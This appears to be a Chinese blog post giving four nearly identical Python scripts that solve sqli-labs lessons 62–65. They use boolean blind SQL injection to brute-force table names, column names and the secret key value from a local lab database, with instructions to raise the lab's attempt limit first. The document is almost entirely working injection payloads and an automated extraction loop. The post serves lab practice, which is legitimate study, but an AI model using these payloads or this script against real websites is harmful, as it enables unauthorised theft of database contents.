运行前需要下载requests
和lxml
包,修改url和referer的参数值,改index.php
中$times= 13000
,重置一下challenges
数据库。
import requests from lxml import etree """ Less-62布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-62/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
import requests from lxml import etree """ Less-63布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-63/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
import requests from lxml import etree """ Less-64布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-64/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
import requests from lxml import etree """ Less-65布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-65/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()